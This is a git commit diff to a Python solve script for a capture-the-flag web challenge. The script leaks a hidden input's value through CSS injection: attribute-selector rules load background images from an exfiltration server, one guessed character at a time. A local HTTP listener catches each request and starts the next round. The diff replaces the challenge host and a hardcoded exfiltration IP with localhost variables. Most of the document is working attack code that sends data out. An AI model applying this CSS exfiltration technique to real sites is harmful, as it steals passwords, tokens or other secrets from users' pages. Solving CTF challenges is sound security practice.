more ctf stuff
This commit is contained in:
@@ -6,7 +6,8 @@ from urllib.parse import unquote
|
||||
|
||||
|
||||
chars = string.ascii_uppercase + string.digits + "f"
|
||||
url = "http://challs2.nusgreyhats.org:33339"
|
||||
url = "http://localhost:33339"
|
||||
exfiltrate_server = "http://localhost:8000"
|
||||
headers = {"Content-Type": "application/x-www-form-urlencoded"}
|
||||
|
||||
|
||||
@@ -21,12 +22,11 @@ class LeakHandler(BaseHTTPRequestHandler):
|
||||
print("Next round")
|
||||
leak_char(leaked_password)
|
||||
|
||||
|
||||
def generate_css_input(leaked_password):
|
||||
css_input = ""
|
||||
|
||||
for a in chars:
|
||||
css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url(http://49.12.225.44:8000/{leaked_password + a});}}'
|
||||
css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url({exfiltrate_server}/{leaked_password + a});}}'
|
||||
|
||||
return css_input
|
||||
|
||||
@@ -41,7 +41,7 @@ def leak_char(leaked_password):
|
||||
if match:
|
||||
id_value = match.group(1)
|
||||
print("Found ID:", id_value)
|
||||
r = requests.post(f"http://challs2.nusgreyhats.org:33339/judge/{id_value}")
|
||||
r = requests.post(f"{url}/judge/{id_value}")
|
||||
print(r.text)
|
||||
else:
|
||||
print("error")
|
||||
|
||||
Reference in New Issue
Block a user